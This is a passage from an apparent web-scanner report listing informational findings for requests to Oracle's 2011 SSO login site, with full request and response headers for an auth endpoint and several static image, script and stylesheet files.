CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=1997378189.25630.0000; expires=Sun, 27-Feb-2011 07:28:34 GMT; path=/

<HTML><HEAD><TITLE>Redirect to https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8
...[SNIP]...

7.341. https://login.oracle.com/sso/auth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso/auth

Request

GET /sso/auth HTTP/1.1
Host: login.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ORASSO_AUTH_HINT=v1.0~20110227072629; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull;

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 26 Feb 2011 23:29:21 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Content-Length: 160
Set-Cookie: ORASSO_AUTH_HINT=v1.0~20110227072921; Domain=.oracle.com; Path=/
Cache-Control: private
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:29:21 GMT; path=/

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1>Unexpected Error. Please contact Administrator.</BODY></HTML>

7.342. https://login.oracle.com/sso_loginui/feed-icon-14x14.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/feed-icon-14x14.png

Request

GET /sso_loginui/feed-icon-14x14.png HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Thu, 08 May 2008 22:01:57 GMT
ETag: "97d52-2b1-48237855"
Accept-Ranges: bytes
Content-Length: 689
Connection: close
Content-Type: image/png
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

.PNG
.
...IHDR..............H-.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...CIDATx...MH.a.......1E"...!.HD*.(...P.Kt..P.n...E..:..oAAH.BR.Q.!....%...B.].......Y...;........y..s......4.
...[SNIP]...

7.343. https://login.oracle.com/sso_loginui/go_button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/go_button.gif

Request

GET /sso_loginui/go_button.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Tue, 22 Apr 2008 05:44:16 GMT
ETag: "97d12-166-480d7b30"
Accept-Ranges: bytes
Content-Length: 358
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

GIF89a............................///........................!.......,.............9..%....V1.D....}.6........+...8. .`0..../%l:...1Y.....B.k..N.aa.P."p..X(....%....D...).f;.W.    .z..@
e#.    RI..BxB..x$.    
...[SNIP]...

7.344. https://login.oracle.com/sso_loginui/hp_spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/hp_spacer.gif

Request

GET /sso_loginui/hp_spacer.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Tue, 22 Apr 2008 05:44:27 GMT
ETag: "97d13-2b-480d7b3b"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

GIF89a.............!.......,...........D..;

7.345. https://login.oracle.com/sso_loginui/moc_lib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/moc_lib.js

Request

GET /sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1298762800321; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; ORASSO_AUTH_HINT=v1.0~20110227072629; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:26:30 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Last-Modified: Fri, 13 May 2005 00:55:51 GMT
ETag: "97d4f-180c-4283fb17"
Accept-Ranges: bytes
Content-Length: 6156
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:26:30 GMT; path=/

//-- moc_lib.js: Core JS library for www.oracle.com
var ORA_UCM_INFO;


//-- Function Library

// to populate the user name -------------------------------------------------//
function Populate
...[SNIP]...

7.346. https://login.oracle.com/sso_loginui/oracle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /sso_loginui/oracle.css

Request

GET /sso_loginui/oracle.css HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=http%3A%2F%2Fmyprofile.oracle.com&ssousername=&subscribername=
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
